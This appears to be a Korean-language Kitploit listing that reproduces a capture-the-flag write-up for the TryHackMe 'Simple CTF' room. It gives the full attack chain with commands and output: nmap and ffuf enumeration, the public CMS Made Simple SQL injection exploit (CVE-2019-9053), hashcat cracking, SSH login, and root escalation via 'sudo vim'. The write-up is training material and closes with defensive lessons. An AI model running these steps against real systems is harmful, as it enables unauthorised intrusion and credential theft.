Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Simple-CTF-Writeup — 전문적인 TryHackMe Simple CTF 워크스루: 열거, CMS Made Simple SQL Injection (CVE-2019-9053), 자격 증명 복구, SSH 액세스, Vim을 통한 권한 상승, 루트 장악을 다룹니다. | Kitploit
도구/GitHubGitHub/imperialx1104/simple-ctf-writeup
Password CrackingPrivilege EscalationReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

전문적인 TryHackMe Simple CTF 워크스루: 열거, CMS Made Simple SQL Injection (CVE-2019-9053), 자격 증명 복구, SSH 액세스, Vim을 통한 권한 상승, 루트 장악을 다룹니다.

2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

Simple-CTF-Writeup

전문 TryHackMe Simple CTF 워크스루: 열거, CMS Made Simple SQL 인젝션(CVE-2019-9053), 자격 증명 복구, SSH 접속, Vim을 통한 권한 상승, 루트 장악.

TryHackMe - Simple CTF Writeup

TryHackMe의 Simple CTF 룸 완전 워크스루: 정찰, 열거, 익스플로잇, 자격 증명 복구, 권한 상승, 플래그 획득.


룸 정보

필드값
플랫폼TryHackMe
룸 이름Simple CTF
난이도Easy
카테고리웹 익스플로잇 & Linux 권한 상승
작성자Saahil Gupta (ImperialX1104)

목표

이 룸의 목표는 다음과 같습니다:

  • 대상 머신을 열거한다.
  • 숨겨진 서비스와 애플리케이션을 발견한다.
  • 취약한 CMS를 익스플로잇한다.
  • 자격 증명을 복구한다.
  • SSH 접속을 획득한다.
  • root로 권한을 상승시킨다.
  • 두 플래그를 모두 획득한다.

공격 개요

root@kitploit:~
호스트 발견
      │
      ▼
포트 열거
      │
      ▼
디렉터리 열거
      │
      ▼
CMS 발견
      │
      ▼
버전 식별
      │
      ▼
SQL 인젝션 (CVE-2019-9053)
      │
      ▼
자격 증명 추출
      │
      ▼
비밀번호 크래킹
      │
      ▼
SSH 접속
      │
      ▼
사용자 플래그
      │
      ▼
권한 상승
      │
      ▼
루트 플래그

정찰

호스트 발견

첫 단계는 대상 머신과의 연결성을 확인하는 것이었습니다.

명령어

root@kitploit:~
ping 10.49.175.174

결과

호스트가 성공적으로 응답하여 연결 가능함을 확인했습니다.

스크린샷

Ping 스캔


포트 열거

노출된 서비스를 식별하기 위해 종합적인 Nmap 스캔을 수행했습니다.

명령어

root@kitploit:~
nmap -A -v 10.49.175.174

결과

포트서비스버전
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

주요 발견 사항

  • 익명 FTP 로그인 활성화
  • Apache 웹 서버 실행 중
  • SSH가 2222번 포트에 노출됨
  • robots.txt 파일 발견

스크린샷

Nmap 열거


웹 열거

대상 웹 서버로 이동하면 기본 Apache 랜딩 페이지가 표시되었습니다.

URL

root@kitploit:~
http://10.49.175.174

스크린샷

Apache 기본 페이지

이 단계에서는 눈에 띄는 공격 표면이 없었습니다.


디렉터리 열거

숨겨진 리소스를 식별하기 위해 FFUF를 사용하여 디렉터리 무차별 대입을 수행했습니다.

명령어

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

결과

root@kitploit:~
simple [Status: 301]

스크린샷

FFUF 열거

/simple 디렉터리가 발견되었습니다.


CMS 발견

발견된 디렉터리로 이동하면 CMS 설치가 드러났습니다.

URL

root@kitploit:~
http://10.49.175.174/simple

스크린샷

CMS Made Simple

식별된 CMS

root@kitploit:~
CMS Made Simple 2.2.8

이 버전 번호는 나중에 결정적인 역할을 했습니다.


취약점 연구

SearchSploit을 사용하여 CMS 버전을 조사했습니다.

명령어

root@kitploit:~
searchsploit "CMS Made Simple"

결과

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

스크린샷

SearchSploit 결과

알려진 SQL 인젝션 취약점이 식별되었습니다.


익스플로잇 획득

익스플로잇을 로컬로 복사하여 분석 및 실행 준비를 했습니다.

명령어

root@kitploit:~
searchsploit -m 46635

출력

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

스크린샷

익스플로잇 다운로드


익스플로잇

공개된 익스플로잇을 대상 CMS 인스턴스에 대해 실행했습니다.

명령어

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

자격 증명 추출

익스플로잇이 백엔드 데이터베이스에서 정보를 성공적으로 추출했습니다.

출력

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

스크린샷

자격 증명 추출

복구된 정보

항목값
사용자명mitch
이메일[email protected]
솔트1dac0d92e9fa6bb2

비밀번호 크래킹

추출된 해시를 Hashcat을 사용하여 크래킹했습니다.

명령어

root@kitploit:~
hashcat -m 20 hash.txt --show

출력

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

복구된 자격 증명

필드값
사용자명mitch
비밀번호secret

스크린샷

Hashcat 비밀번호 복구


초기 접속

복구된 자격 증명을 SSH 서비스에 대해 테스트했습니다.

명령어

root@kitploit:~
ssh [email protected] -p 2222

비밀번호

root@kitploit:~
secret

결과

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

스크린샷

SSH 접속

성공적인 인증으로 mitch 사용자로 셸 접속이 가능해졌습니다.


사용자 플래그

접속 후 Mitch의 홈 디렉터리에서 사용자 플래그를 찾았습니다.

명령어

root@kitploit:~
whoami
cd ~
cat user.txt

출력

root@kitploit:~
G00d j0b, keep up!

스크린샷

사용자 플래그


권한 상승

sudo 열거

sudo 권한을 확인하여 흥미로운 구성을 발견했습니다.

명령어

root@kitploit:~
sudo -l

출력

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

스크린샷

sudo -l 출력

이 구성은 사용자가 비밀번호 없이 Vim을 root 권한으로 실행할 수 있게 합니다.


root 접속

Vim을 root로 실행:

root@kitploit:~
sudo vim

Vim이 상승된 권한으로 실행 중이므로 root 소유 파일에 접근할 수 있었습니다.

스크린샷

Vim을 통한 root 접속


루트 플래그

루트 플래그는 root 사용자의 디렉터리에 위치했습니다.

명령어

root@kitploit:~
:! cat /root/root.txt

출력

root@kitploit:~
W3ll d0n3. You made it!

스크린샷

루트 플래그


획득한 플래그

사용자 플래그

root@kitploit:~
G00d j0b, keep up!

루트 플래그

root@kitploit:~
W3ll d0n3. You made it!

공격 체인 요약

root@kitploit:~
Nmap 스캔
    ↓
웹 열거
    ↓
디렉터리 발견 (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
SearchSploit 연구
    ↓
CVE-2019-9053 SQL 인젝션
    ↓
자격 증명 추출
    ↓
해시 크래킹
    ↓
SSH 로그인 (mitch:secret)
    ↓
사용자 플래그
    ↓
sudo -l
    ↓
Vim 권한 상승
    ↓
루트 플래그

배운 점

열거가 중요하다

취약한 CMS는 홈페이지에 보이지 않았고 디렉터리 열거를 통해 발견되었습니다.

버전 식별이 결정적이다

정확한 CMS 버전이 알려진 취약점으로 직접 연결되었습니다.

자격 증명 재사용

복구된 자격 증명은 항상 모든 사용 가능한 서비스에 대해 테스트해야 합니다.

sudo 잘못된 구성은 위험하다

Vim과 같은 편집기를 특권 실행하도록 허용하면 전체 시스템 장악으로 이어질 수 있습니다.


사용된 도구

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

결론

이 룸은 초기 열거부터 전체 루트 장악까지 완전한 공격 체인을 시연했습니다. 웹 애플리케이션 열거, SQL 인젝션 익스플로잇, 비밀번호 크래킹, Linux 권한 상승 기법을 결합하여 대상 시스템을 완전히 제어할 수 있었습니다.

이 룸은 실제 침투 테스트 방법론에 대한 훌륭한 입문서 역할을 하며, 적절한 소프트웨어 패치, 자격 증명 보안, 최소 권한 접근 제어의 중요성을 강조합니다.


작성자

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ 이 워크스루가 유용했다면 저장소에 별표를 남기고 GitHub에서 저와 연결해 주세요.

도구 다운로드